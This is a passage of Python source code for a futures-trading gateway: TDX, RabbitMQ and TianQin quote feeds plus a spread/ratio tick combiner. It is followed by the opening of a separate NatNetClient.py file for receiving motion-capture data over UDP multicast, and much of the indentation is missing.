self.gateway.write_log(u'tdx还没有启动连接,就启动连接')
self.close()
self.thread = None
self.connect(is_reconnect=True)
def qry_instrument(self):
"""
查询/更新合约信息
:return:
"""
if not self.connection_status:
self.gateway.write_error(u'tdx连接状态为断开,不能查询和更新合约信息')
return
if self.has_qry_instrument:
self.gateway.write_error(u'已经查询过一次合约信息,不再查询')
return
# 取得所有的合约信息
num = self.api.get_instrument_count()
if not isinstance(num, int):
return
all_contacts = sum(
[self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)], [])
        # [{"category": category, "market": int, "code": string, "name": string, "desc": string}, {}]
# 对所有合约处理,更新字典 指数合约-tdx市场,指数合约-交易所
for tdx_contract in all_contacts:
tdx_symbol = tdx_contract.get('code', None)
if tdx_symbol is None or tdx_symbol[-2:] not in ['L9']:
continue
tdx_market_id = tdx_contract.get('market')
self.symbol_market_dict[tdx_symbol] = tdx_market_id
if tdx_market_id == 47: # 中金所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CFFEX
elif tdx_market_id == 28: # 郑商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CZCE
elif tdx_market_id == 29: # 大商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.DCE
elif tdx_market_id == 30: # 上期所+能源
self.symbol_exchange_dict[tdx_symbol] = Exchange.SHFE
elif tdx_market_id == 60: # 主力合约
self.gateway.write_log(u'主力合约:{}'.format(tdx_contract))
self.has_qry_instrument = True
def run(self):
# 直接查询板块
try:
last_dt = datetime.now()
self.gateway.write_log(u'开始运行tdx查询指数行情线程,{}'.format(last_dt))
while self.connection_status:
if len(self.registered_symbol_set) > 0:
try:
self.process_index_req()
except BrokenPipeError as bex:
self.gateway.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), 0))
self.connect(is_reconnect=True)
sleep(5)
break
except Exception as ex:
self.gateway.write_error(u'tdx exception:{},{}'.format(str(ex), traceback.format_exc()))
self.gateway.write_error(u'重试重连tdx')
self.connect(is_reconnect=True)
sleep(self.req_interval)
dt = datetime.now()
if last_dt.minute != dt.minute:
self.gateway.write_log(
'tdx check point. {}, process symbols:{}'.format(dt, self.registered_symbol_set))
last_dt = dt
except Exception as ex:
self.gateway.write_error(u'tdx thead.run exception:{},{}'.format(str(ex), traceback.format_exc()))
self.gateway.write_error(u'tdx查询线程 {}退出'.format(datetime.now()))
def process_index_req(self):
"""处理板块获取指数行情tick"""
# 获取通达信指数板块所有行情
rt_list = self.api.get_instrument_quote_list(42, 3, 0, 100)
if rt_list is None or len(rt_list) == 0:
self.gateway.write_log(u'tdx: rt_list为空')
return
# 记录该接口的行情最后更新时间
self.last_tick_dt = datetime.now()
for d in list(rt_list):
tdx_symbol = d.get('code', None)
            if tdx_symbol is None or tdx_symbol not in self.registered_symbol_set:
continue
# tdx_symbol => vn_symbol
vn_symbol = self.symbol_vn_dict.get(tdx_symbol, None)
if vn_symbol is None:
self.gateway.write_error(u'self.symbol_vn_dict 取不到映射得:{}'.format(tdx_symbol))
continue
# vn_symbol => exchange
exchange = self.symbol_exchange_dict.get(tdx_symbol, None)
underlying_symbol = get_underlying_symbol(vn_symbol)
if exchange is None:
symbol_info = future_contracts.get(underlying_symbol, None)
if not symbol_info:
continue
exchange_value = symbol_info.get('exchange', None)
exchange = Exchange(exchange_value)
if exchange is None:
continue
self.symbol_exchange_dict.update({tdx_symbol: exchange})
tick_datetime = datetime.now()
# 修正毫秒
last_tick = self.symbol_tick_dict.get(vn_symbol, None)
            if (last_tick is not None) and tick_datetime.replace(microsecond=0) == last_tick.datetime:
                # 与上一个tick的时间(去除毫秒后)相同,修改为500毫秒
                tick_datetime = tick_datetime.replace(microsecond=500000)
else:
tick_datetime = tick_datetime.replace(microsecond=0)
tick = TickData(gateway_name=self.gateway_name,
symbol=vn_symbol,
exchange=exchange,
datetime=tick_datetime)
tick.pre_close = float(d.get('ZuoJie', 0.0))
tick.high_price = float(d.get('ZuiGao', 0.0))
tick.open_price = float(d.get('JinKai', 0.0))
tick.low_price = float(d.get('ZuiDi', 0.0))
tick.last_price = float(d.get('MaiChu', 0.0))
tick.volume = int(d.get('XianLiang', 0))
tick.open_interest = d.get('ChiCangLiang')
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.trading_day = get_trading_date(tick.datetime)
# 指数没有涨停和跌停,就用昨日收盘价正负10%
tick.limit_up = tick.pre_close * 1.1
tick.limit_down = tick.pre_close * 0.9
# CTP只有一档行情
tick.bid_price_1 = float(d.get('MaiRuJia', 0.0))
tick.bid_volume_1 = int(d.get('MaiRuLiang', 0))
tick.ask_price_1 = float(d.get('MaiChuJia', 0.0))
tick.ask_volume_1 = int(d.get('MaiChuLiang', 0))
# 排除非交易时间得tick
if tick.exchange is Exchange.CFFEX:
if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
continue
if tick.datetime.hour == 9 and tick.datetime.minute < 15:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
if tick.datetime.hour == 15 and tick.datetime.minute >= 15 and underlying_symbol in ['T', 'TF', 'TS']:
continue
if tick.datetime.hour == 15 and underlying_symbol in ['IH', 'IF', 'IC']:
continue
else: # 大商所/郑商所,上期所,上海能源
# 排除非开盘小时
if tick.datetime.hour in [3, 4, 5, 6, 7, 8, 12, 15, 16, 17, 18, 19, 20]:
continue
# 排除早盘 10:15~10:30
if tick.datetime.hour == 10 and 15 <= tick.datetime.minute < 30:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
# 排除午盘 13:00 ~13:30
if tick.datetime.hour == 13 and tick.datetime.minute < 30:
continue
# 排除凌晨2:30~3:00
if tick.datetime.hour == 2 and tick.datetime.minute >= 30:
continue
# 排除大商所/郑商所夜盘数据上期所夜盘数据 23:00 收盘
if underlying_symbol in NIGHT_MARKET_23:
if tick.datetime.hour in [23, 0, 1, 2]:
continue
# 排除上期所夜盘数据 1:00 收盘
if underlying_symbol in NIGHT_MARKET_SQ2:
if tick.datetime.hour in [1, 2]:
continue
# 排除日盘合约在夜盘得数据
if underlying_symbol in MARKET_DAY_ONLY and (tick.datetime.hour < 9 or tick.datetime.hour > 16):
# self.write_log(u'排除日盘合约{}在夜盘得数据'.format(short_symbol))
continue
# self.gateway.write_log(f'{tick.__dict__}')
self.symbol_tick_dict[tick.symbol] = tick
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
class SubMdApi():
"""
RabbitMQ Subscriber 数据行情接收API
"""
def __init__(self, gateway):
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.symbol_tick_dict = {} # 合约与最后一个Tick得字典
self.registed_symbol_set = set() # 订阅的合约记录集
self.sub = None
self.setting = {}
self.connect_status = False
self.thread = None
def connect(self, setting={}):
"""连接"""
self.setting = setting
try:
self.sub = subscriber(
host=self.setting.get('host', 'localhost'),
port=self.setting.get('port', 5672),
user=self.setting.get('user', 'admin'),
password=self.setting.get('password', 'admin'),
exchange=self.setting.get('exchange', 'x_fanout_idx_tick'))
self.sub.set_callback(self.on_message)
self.thread = Thread(target=self.sub.start)
self.thread.start()
self.connect_status = True
self.gateway.status.update({'sub_con': True, 'sub_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
except Exception as ex:
self.gateway.write_error(u'连接RabbitMQ {} 异常:{}'.format(self.setting, str(ex)))
self.gateway.write_error(traceback.format_exc())
self.connect_status = False
def on_message(self, chan, method_frame, _header_frame, body, userdata=None):
# print(" [x] %r" % body)
try:
str_tick = body.decode('utf-8')
d = json.loads(str_tick)
d.pop('rawData', None)
d = self.conver_update(d)
symbol = d.pop('symbol', None)
str_datetime = d.pop('datetime', None)
if symbol not in self.registed_symbol_set or str_datetime is None:
return
if '.' in str_datetime:
dt = datetime.strptime(str_datetime, '%Y-%m-%d %H:%M:%S.%f')
else:
dt = datetime.strptime(str_datetime, '%Y-%m-%d %H:%M:%S')
tick = TickData(gateway_name=self.gateway_name,
exchange=Exchange(d.get('exchange')),
symbol=symbol,
datetime=dt)
d.pop('exchange', None)
d.pop('symbol', None)
tick.__dict__.update(d)
self.symbol_tick_dict[symbol] = tick
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
except Exception as ex:
self.gateway.write_error(u'RabbitMQ on_message 异常:{}'.format(str(ex)))
self.gateway.write_error(traceback.format_exc())
def conver_update(self, d):
"""转换dict, vnpy1 tick dict => vnpy2 tick dict"""
if 'vtSymbol' not in d:
return d
symbol= d.get('symbol')
exchange = d.get('exchange')
vtSymbol = d.pop('vtSymbol', symbol)
if '.' not in symbol:
d.update({'vt_symbol': f'{symbol}.{exchange}'})
else:
d.update({'vt_symbol': f'{symbol}.{Exchange.LOCAL.value}'})
# 成交数据
d.update({'last_price': d.pop('lastPrice',0.0)}) # 最新成交价
d.update({'last_volume': d.pop('lastVolume', 0)}) # 最新成交量
d.update({'open_interest': d.pop('openInterest', 0)}) # 昨持仓量
        d.update({'trading_day': d.pop('tradingDay', get_trading_date())})
# 常规行情
d.update({'open_price': d.pop('openPrice', 0)}) # 今日开盘价
d.update({'high_price': d.pop('highPrice', 0)}) # 今日最高价
d.update({'low_price': d.pop('lowPrice', 0)}) # 今日最低价
d.update({'pre_close': d.pop('preClosePrice', 0)}) # 昨收盘价
d.update({'limit_up': d.pop('upperLimit', 0)}) # 涨停价
d.update({'limit_down': d.pop('lowerLimit', 0)}) # 跌停价
# 五档行情
d.update({'bid_price_1': d.pop('bidPrice1', 0.0)})
d.update({'bid_price_2': d.pop('bidPrice2', 0.0)})
d.update({'bid_price_3': d.pop('bidPrice3', 0.0)})
d.update({'bid_price_4': d.pop('bidPrice4', 0.0)})
d.update({'bid_price_5': d.pop('bidPrice5', 0.0)})
d.update({'ask_price_1': d.pop('askPrice1', 0.0)})
d.update({'ask_price_2': d.pop('askPrice2', 0.0)})
d.update({'ask_price_3': d.pop('askPrice3', 0.0)})
d.update({'ask_price_4': d.pop('askPrice4', 0.0)})
d.update({'ask_price_5': d.pop('askPrice5', 0.0)})
d.update({'bid_volume_1': d.pop('bidVolume1', 0.0)})
d.update({'bid_volume_2': d.pop('bidVolume2', 0.0)})
d.update({'bid_volume_3': d.pop('bidVolume3', 0.0)})
d.update({'bid_volume_4': d.pop('bidVolume4', 0.0)})
d.update({'bid_volume_5': d.pop('bidVolume5', 0.0)})
d.update({'ask_volume_1': d.pop('askVolume1', 0.0)})
d.update({'ask_volume_2': d.pop('askVolume2', 0.0)})
d.update({'ask_volume_3': d.pop('askVolume3', 0.0)})
d.update({'ask_volume_4': d.pop('askVolume4', 0.0)})
d.update({'ask_volume_5': d.pop('askVolume5', 0.0)})
return d
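    # A minimal sketch of what conver_update() does (vnpy 1.x field names, made-up values):
    #
    #   {"vtSymbol": "RB99", "symbol": "RB99", "exchange": "SHFE",
    #    "lastPrice": 5100.0, "bidPrice1": 5099.0, "askPrice1": 5101.0, ...}
    # becomes
    #   {"symbol": "RB99", "exchange": "SHFE", "vt_symbol": "RB99.SHFE",
    #    "last_price": 5100.0, "bid_price_1": 5099.0, "ask_price_1": 5101.0, ...}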
def close(self):
"""退出API"""
self.gateway.write_log(u'退出rabbit行情订阅API')
        self.connect_status = False
try:
if self.sub:
self.gateway.write_log(u'关闭订阅器')
self.sub.close()
if self.thread is not None:
self.gateway.write_log(u'关闭订阅器接收线程')
self.thread.join()
except Exception as ex:
self.gateway.write_error(u'退出rabbitMQ行情api异常:{}'.format(str(ex)))
# ----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
vn_symbol = str(subscribeReq.symbol)
vn_symbol = vn_symbol.upper()
if vn_symbol not in self.registed_symbol_set:
self.registed_symbol_set.add(vn_symbol)
self.gateway.write_log(u'RabbitMQ行情订阅 {}'.format(str(vn_symbol)))
class TqMdApi():
"""天勤行情API"""
def __init__(self, gateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.api = None
self.is_connected = False
self.subscribe_array = []
# 行情对象列表
self.quote_objs = []
# 数据更新线程
self.update_thread = None
# 所有的合约
self.all_instruments = []
self.ticks = {}
def connect(self, setting):
""""""
try:
from tqsdk import TqApi
self.api = TqApi()
except Exception as e:
            self.gateway.write_log('天勤行情API接入异常:{}'.format(str(e)))
if self.api:
self.is_connected = True
self.gateway.write_log(f'天勤行情API已连接')
self.update_thread = Thread(target=self.update)
self.update_thread.start()
def generate_tick_from_quote(self, vt_symbol, quote) -> TickData:
"""
生成TickData
"""
        # 清洗 nan: NaN != NaN, so "v != v" is only true for NaN values, which are replaced with 0
        quote = {k: 0 if v != v else v for k, v in quote.items()}
symbol, exchange = extract_vt_symbol(vt_symbol)
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.strptime(quote["datetime"], "%Y-%m-%d %H:%M:%S.%f"),
name=symbol,
volume=quote["volume"],
open_interest=quote["open_interest"],
last_price=quote["last_price"],
limit_up=quote["upper_limit"],
limit_down=quote["lower_limit"],
open_price=quote["open"],
high_price=quote["highest"],
low_price=quote["lowest"],
pre_close=quote["pre_close"],
bid_price_1=quote["bid_price1"],
bid_price_2=quote["bid_price2"],
bid_price_3=quote["bid_price3"],
bid_price_4=quote["bid_price4"],
bid_price_5=quote["bid_price5"],
ask_price_1=quote["ask_price1"],
ask_price_2=quote["ask_price2"],
ask_price_3=quote["ask_price3"],
ask_price_4=quote["ask_price4"],
ask_price_5=quote["ask_price5"],
bid_volume_1=quote["bid_volume1"],
bid_volume_2=quote["bid_volume2"],
bid_volume_3=quote["bid_volume3"],
bid_volume_4=quote["bid_volume4"],
bid_volume_5=quote["bid_volume5"],
ask_volume_1=quote["ask_volume1"],
ask_volume_2=quote["ask_volume2"],
ask_volume_3=quote["ask_volume3"],
ask_volume_4=quote["ask_volume4"],
ask_volume_5=quote["ask_volume5"],
gateway_name=self.gateway_name
)
if symbol.endswith('99') and tick.ask_price_1 == 0.0 and tick.bid_price_1 == 0.0:
price_tick = quote['price_tick']
if isinstance(price_tick, float) or isinstance(price_tick,int):
tick.ask_price_1 = tick.last_price + price_tick
tick.ask_volume_1 = 1
tick.bid_price_1 = tick.last_price - price_tick
tick.bid_volume_1 = 1
return tick
def update(self) -> None:
"""
更新行情/委托/账户/持仓
"""
while self.api.wait_update():
# 更新行情信息
for vt_symbol, quote in self.quote_objs:
if self.api.is_changing(quote):
tick = self.generate_tick_from_quote(vt_symbol, quote)
if tick:
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
def subscribe(self, req: SubscribeRequest) -> None:
"""
订阅行情
"""
if req.vt_symbol not in self.subscribe_array:
symbol, exchange = extract_vt_symbol(req.vt_symbol)
try:
quote = self.api.get_quote(vt_to_tq_symbol(symbol, exchange))
self.quote_objs.append((req.vt_symbol, quote))
self.subscribe_array.append(req.vt_symbol)
except Exception as ex:
self.gateway.write_log('订阅天勤行情异常:{}'.format(str(ex)))
def query_contracts(self) -> None:
""""""
self.all_instruments = [
v for k, v in self.api._data["quotes"].items() if v["expired"] == False
]
for contract in self.all_instruments:
if (
"SSWE" in contract["instrument_id"]
or "CSI" in contract["instrument_id"]
):
# vnpy没有这两个交易所,需要可以自行修改vnpy代码
continue
vt_symbol = tq_to_vt_symbol(contract["instrument_id"])
symbol, exchange = extract_vt_symbol(vt_symbol)
if TQ2VT_TYPE[contract["ins_class"]] == Product.OPTION:
contract_data = ContractData(
symbol=symbol,
exchange=exchange,
name=symbol,
product=TQ2VT_TYPE[contract["ins_class"]],
size=contract["volume_multiple"],
pricetick=contract["price_tick"],
history_data=True,
option_strike=contract["strike_price"],
option_underlying=tq_to_vt_symbol(contract["underlying_symbol"]),
option_type=OptionType[contract["option_class"]],
option_expiry=datetime.fromtimestamp(contract["expire_datetime"]),
option_index=tq_to_vt_symbol(contract["underlying_symbol"]),
gateway_name=self.gateway_name,
)
else:
contract_data = ContractData(
symbol=symbol,
exchange=exchange,
name=symbol,
product=TQ2VT_TYPE[contract["ins_class"]],
size=contract["volume_multiple"],
pricetick=contract["price_tick"],
history_data=True,
gateway_name=self.gateway_name,
)
self.gateway.on_contract(contract_data)
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""
获取历史数据
"""
symbol = req.symbol
exchange = req.exchange
interval = req.interval
start = req.start
end = req.end
# 天勤需要的数据
tq_symbol = vt_to_tq_symbol(symbol, exchange)
tq_interval = INTERVAL_VT2TQ.get(interval)
end += timedelta(1)
total_days = end - start
# 一次最多只能下载 8964 根Bar
min_length = min(8964, total_days.days * 500)
df = self.api.get_kline_serial(tq_symbol, tq_interval, min_length).sort_values(
by=["datetime"]
)
# 时间戳对齐
df["datetime"] = pd.to_datetime(df["datetime"] + TIME_GAP)
# 过滤开始结束时间
df = df[(df["datetime"] >= start - timedelta(days=1)) & (df["datetime"] < end)]
data: List[BarData] = []
if df is not None:
for ix, row in df.iterrows():
bar = BarData(
symbol=symbol,
exchange=exchange,
interval=interval,
datetime=row["datetime"].to_pydatetime(),
open_price=row["open"],
high_price=row["high"],
low_price=row["low"],
close_price=row["close"],
volume=row["volume"],
open_interest=row.get("close_oi", 0),
gateway_name=self.gateway_name,
)
data.append(bar)
return data
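    # Hedged usage sketch for query_history() (values are illustrative):
    #
    # req = HistoryRequest(
    #     symbol="rb2110",
    #     exchange=Exchange.SHFE,
    #     interval=Interval.MINUTE,
    #     start=datetime(2021, 6, 1),
    #     end=datetime(2021, 6, 10),
    # )
    # bars = tq_md_api.query_history(req)   # -> List[BarData]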
def close(self) -> None:
""""""
try:
if self.api:
self.api.close()
self.is_connected = False
if self.update_thread:
self.update_thread.join()
except Exception as e:
self.gateway.write_log('退出天勤行情api异常:{}'.format(str(e)))
class TickCombiner(object):
"""
Tick合成类
"""
def __init__(self, gateway, setting):
self.gateway = gateway
self.gateway_name = self.gateway.gateway_name
self.gateway.write_log(u'创建tick合成类:{}'.format(setting))
self.symbol = setting.get('symbol', None)
self.leg1_symbol = setting.get('leg1_symbol', None)
self.leg2_symbol = setting.get('leg2_symbol', None)
self.leg1_ratio = setting.get('leg1_ratio', 1) # 腿1的数量配比
self.leg2_ratio = setting.get('leg2_ratio', 1) # 腿2的数量配比
self.price_tick = setting.get('price_tick', 1) # 合成价差加比后的最小跳动
# 价差
self.is_spread = setting.get('is_spread', False)
# 价比
self.is_ratio = setting.get('is_ratio', False)
self.last_leg1_tick = None
self.last_leg2_tick = None
# 价差日内最高/最低价
self.spread_high = None
self.spread_low = None
# 价比日内最高/最低价
self.ratio_high = None
self.ratio_low = None
# 当前交易日
self.trading_day = None
if self.is_ratio and self.is_spread:
self.gateway.write_error(u'{}参数有误,不能同时做价差/加比.setting:{}'.format(self.symbol, setting))
return
self.gateway.write_log(u'初始化{}合成器成功'.format(self.symbol))
if self.is_spread:
self.gateway.write_log(
u'leg1:{} * {} - leg2:{} * {}'.format(self.leg1_symbol, self.leg1_ratio, self.leg2_symbol,
self.leg2_ratio))
if self.is_ratio:
self.gateway.write_log(
u'leg1:{} * {} / leg2:{} * {}'.format(self.leg1_symbol, self.leg1_ratio, self.leg2_symbol,
self.leg2_ratio))
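    # Worked example (editor's sketch, numbers made up) for a 1:1 spread combiner:
    #   leg1 ask 4005 / bid 4003, leg2 ask 3501 / bid 3500
    #   spread ask_price_1 = 4005 * 1 - 3500 * 1 = 505
    #   spread bid_price_1 = 4003 * 1 - 3501 * 1 = 502
    #   spread last_price  = (505 + 502) / 2 = 503.5, then rounded to price_tick
    # With the same inputs a ratio combiner quotes 100 * 4005 / 3500 ≈ 114.43 on the ask side.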
def on_tick(self, tick):
"""OnTick处理"""
combinable = False
if tick.symbol == self.leg1_symbol:
# leg1合约
self.last_leg1_tick = tick
if self.last_leg2_tick is not None:
if self.last_leg1_tick.datetime.replace(microsecond=0) == self.last_leg2_tick.datetime.replace(
microsecond=0):
combinable = True
elif tick.symbol == self.leg2_symbol:
# leg2合约
self.last_leg2_tick = tick
if self.last_leg1_tick is not None:
if self.last_leg2_tick.datetime.replace(microsecond=0) == self.last_leg1_tick.datetime.replace(
microsecond=0):
combinable = True
# 不能合并
if not combinable:
return
if not self.is_ratio and not self.is_spread:
return
# 以下情况,基本为单腿涨跌停,不合成价差/价格比 Tick
if (self.last_leg1_tick.ask_price_1 == 0 or self.last_leg1_tick.bid_price_1 == self.last_leg1_tick.limit_up) \
and self.last_leg1_tick.ask_volume_1 == 0:
self.gateway.write_log(
u'leg1:{0}涨停{1},不合成价差Tick'.format(self.last_leg1_tick.vt_symbol, self.last_leg1_tick.bid_price_1))
return
if (self.last_leg1_tick.bid_price_1 == 0 or self.last_leg1_tick.ask_price_1 == self.last_leg1_tick.limit_down) \
and self.last_leg1_tick.bid_volume_1 == 0:
self.gateway.write_log(
u'leg1:{0}跌停{1},不合成价差Tick'.format(self.last_leg1_tick.vt_symbol, self.last_leg1_tick.ask_price_1))
return
if (self.last_leg2_tick.ask_price_1 == 0 or self.last_leg2_tick.bid_price_1 == self.last_leg2_tick.limit_up) \
and self.last_leg2_tick.ask_volume_1 == 0:
self.gateway.write_log(
u'leg2:{0}涨停{1},不合成价差Tick'.format(self.last_leg2_tick.vt_symbol, self.last_leg2_tick.bid_price_1))
return
if (self.last_leg2_tick.bid_price_1 == 0 or self.last_leg2_tick.ask_price_1 == self.last_leg2_tick.limit_down) \
and self.last_leg2_tick.bid_volume_1 == 0:
self.gateway.write_log(
u'leg2:{0}跌停{1},不合成价差Tick'.format(self.last_leg2_tick.vt_symbol, self.last_leg2_tick.ask_price_1))
return
if self.trading_day != tick.trading_day:
self.trading_day = tick.trading_day
self.spread_high = None
self.spread_low = None
self.ratio_high = None
self.ratio_low = None
if self.is_spread:
spread_tick = TickData(gateway_name=self.gateway_name,
symbol=self.symbol,
exchange=Exchange.SPD,
datetime=tick.datetime)
spread_tick.trading_day = tick.trading_day
spread_tick.date = tick.date
spread_tick.time = tick.time
# 叫卖价差=leg1.ask_price_1 * 配比 - leg2.bid_price_1 * 配比,volume为两者最小
spread_tick.ask_price_1 = round_to(target=self.price_tick,
value=self.last_leg1_tick.ask_price_1 * self.leg1_ratio - self.last_leg2_tick.bid_price_1 * self.leg2_ratio)
spread_tick.ask_volume_1 = min(self.last_leg1_tick.ask_volume_1, self.last_leg2_tick.bid_volume_1)
# 叫买价差=leg1.bid_price_1 * 配比 - leg2.ask_price_1 * 配比,volume为两者最小
spread_tick.bid_price_1 = round_to(target=self.price_tick,
value=self.last_leg1_tick.bid_price_1 * self.leg1_ratio - self.last_leg2_tick.ask_price_1 * self.leg2_ratio)
spread_tick.bid_volume_1 = min(self.last_leg1_tick.bid_volume_1, self.last_leg2_tick.ask_volume_1)
# 最新价
spread_tick.last_price = round_to(target=self.price_tick,
value=(spread_tick.ask_price_1 + spread_tick.bid_price_1) / 2)
# 昨收盘价
if self.last_leg2_tick.pre_close > 0 and self.last_leg1_tick.pre_close > 0:
spread_tick.pre_close = round_to(target=self.price_tick,
value=self.last_leg1_tick.pre_close * self.leg1_ratio - self.last_leg2_tick.pre_close * self.leg2_ratio)
# Open price
if self.last_leg2_tick.open_price > 0 and self.last_leg1_tick.open_price > 0:
spread_tick.open_price = round_to(target=self.price_tick,
value=self.last_leg1_tick.open_price * self.leg1_ratio - self.last_leg2_tick.open_price * self.leg2_ratio)
# High price
if self.spread_high:
self.spread_high = max(self.spread_high, spread_tick.ask_price_1)
else:
self.spread_high = spread_tick.ask_price_1
spread_tick.high_price = self.spread_high
# Low price
if self.spread_low:
self.spread_low = min(self.spread_low, spread_tick.bid_price_1)
else:
self.spread_low = spread_tick.bid_price_1
spread_tick.low_price = self.spread_low
self.gateway.on_tick(spread_tick)
if self.is_ratio:
ratio_tick = TickData(
gateway_name=self.gateway_name,
symbol=self.symbol,
exchange=Exchange.SPD,
datetime=tick.datetime
)
ratio_tick.trading_day = tick.trading_day
ratio_tick.date = tick.date
ratio_tick.time = tick.time
# Ratio tick = 100 * (leg1 price * leg1 lots) / (leg2 price * leg2 lots), expressed as a percentage
ratio_tick.ask_price_1 = 100 * self.last_leg1_tick.ask_price_1 * self.leg1_ratio \
/ (self.last_leg2_tick.bid_price_1 * self.leg2_ratio) # noqa
ratio_tick.ask_price_1 = round_to(
target=self.price_tick,
value=ratio_tick.ask_price_1
)
ratio_tick.ask_volume_1 = min(self.last_leg1_tick.ask_volume_1, self.last_leg2_tick.bid_volume_1)
ratio_tick.bid_price_1 = 100 * self.last_leg1_tick.bid_price_1 * self.leg1_ratio \
/ (self.last_leg2_tick.ask_price_1 * self.leg2_ratio) # noqa
ratio_tick.bid_price_1 = round_to(
target=self.price_tick,
value=ratio_tick.bid_price_1
)
ratio_tick.bid_volume_1 = min(self.last_leg1_tick.bid_volume_1, self.last_leg2_tick.ask_volume_1)
ratio_tick.last_price = (ratio_tick.ask_price_1 + ratio_tick.bid_price_1) / 2
ratio_tick.last_price = round_to(
target=self.price_tick,
value=ratio_tick.last_price
)
# Previous close
if self.last_leg2_tick.pre_close > 0 and self.last_leg1_tick.pre_close > 0:
ratio_tick.pre_close = 100 * self.last_leg1_tick.pre_close * self.leg1_ratio / (
self.last_leg2_tick.pre_close * self.leg2_ratio) # noqa
ratio_tick.pre_close = round_to(
target=self.price_tick,
value=ratio_tick.pre_close
)
# Open price
if self.last_leg2_tick.open_price > 0 and self.last_leg1_tick.open_price > 0:
ratio_tick.open_price = 100 * self.last_leg1_tick.open_price * self.leg1_ratio / (
self.last_leg2_tick.open_price * self.leg2_ratio) # noqa
ratio_tick.open_price = round_to(
target=self.price_tick,
value=ratio_tick.open_price
)
# High price
if self.ratio_high:
self.ratio_high = max(self.ratio_high, ratio_tick.ask_price_1)
else:
self.ratio_high = ratio_tick.ask_price_1
ratio_tick.high_price = self.ratio_high
# Low price
if self.ratio_low:
self.ratio_low = min(self.ratio_low, ratio_tick.bid_price_1)
else:
self.ratio_low = ratio_tick.bid_price_1
ratio_tick.low_price = self.ratio_low
self.gateway.on_tick(ratio_tick)
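# A minimal standalone sketch of the spread/ratio arithmetic used in on_tick above,
# with illustrative prices, both leg ratios assumed to be 1, and rounding to
# price_tick omitted.
def _spread_and_ratio_example(leg1_bid=3510.0, leg1_ask=3512.0,
                              leg2_bid=3400.0, leg2_ask=3402.0):
    ask_spread = leg1_ask - leg2_bid              # 112.0
    bid_spread = leg1_bid - leg2_ask              # 108.0
    last_spread = (ask_spread + bid_spread) / 2   # 110.0
    ask_ratio = 100 * leg1_ask / leg2_bid         # ~103.29
    bid_ratio = 100 * leg1_bid / leg2_ask         # ~103.17
    return ask_spread, bid_spread, last_spread, ask_ratio, bid_ratio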
|
NatNetClient.py
|
"""
This file was taken from the NatNet SDK and modified.
NatNet Version 2.10.0 (06/15/2016)
"""
import socket
import struct
from threading import Thread
def trace(*args):
pass # print("".join(map(str, args)))
# Create structs for reading various object types to speed up parsing.
Vector3 = struct.Struct('<fff')
Quaternion = struct.Struct('<ffff')
FloatValue = struct.Struct('<f')
DoubleValue = struct.Struct('<d')
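# Sketch of how these structs decode fixed little-endian chunks of a packet
# (the byte values below are illustrative, not real NatNet data).
def _struct_example():
    raw = struct.pack('<fff', 1.0, 2.0, 3.0) + struct.pack('<ffff', 0.0, 0.0, 0.0, 1.0)
    pos = Vector3.unpack(raw[0:12])       # (1.0, 2.0, 3.0)
    rot = Quaternion.unpack(raw[12:28])   # (0.0, 0.0, 0.0, 1.0)
    return pos, rot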
class NatNetClient:
def __init__(self, server_ip_address="192.168.0.105", local_ip_address="192.168.0.147",
multicast_address="239.255.42.99", command_port=1510, data_port=1511):
# Change this value to the IP address of the NatNet server.
self.server_ip_address = server_ip_address
# Change this value to the IP address of your local network interface
self.local_ip_address = local_ip_address
# This should match the multicast address listed in Motive's streaming settings.
self.multicast_address = multicast_address
# NatNet Command channel
self.command_port = command_port
# NatNet Data channel
self.data_port = data_port
# Set this to a callback method of your choice to receive data for each new frame.
self.new_frame_listener = None
# Set this to a callback method of your choice to receive per-rigid-body data at each frame.
self.rigid_body_listener = None
# NatNet stream version. This will be updated to the actual version the server is using during initialization.
self.__nat_net_stream_version = (2, 10, 0, 0)
# Client/server message ids
NAT_PING = 0
NAT_PINGRESPONSE = 1
NAT_REQUEST = 2 # Unrecognized request
NAT_RESPONSE = 3
NAT_REQUEST_MODELDEF = 4
NAT_MODELDEF = 5
NAT_REQUEST_FRAMEOFDATA = 6 # Unrecognized request
NAT_FRAMEOFDATA = 7
NAT_MESSAGESTRING = 8
NAT_DISCONNECT = 9
NAT_UNRECOGNIZED_REQUEST = 100
# Create a data socket to attach to the NatNet stream
def __create_data_socket(self, port):
result = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# buffer size to 1 for real-time display
result.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1)
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.multicast_address) + socket.inet_aton(self.local_ip_address))
result.bind(('', port))
return result
# Create a command socket to attach to the NatNet stream
def __create_command_socket(self):
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.bind(('', 0))
result.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
return result
# Unpack a rigid body object from a data packet
def __unpack_rigid_body(self, data):
offset = 0
# ID (4 bytes)
rigid_body_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
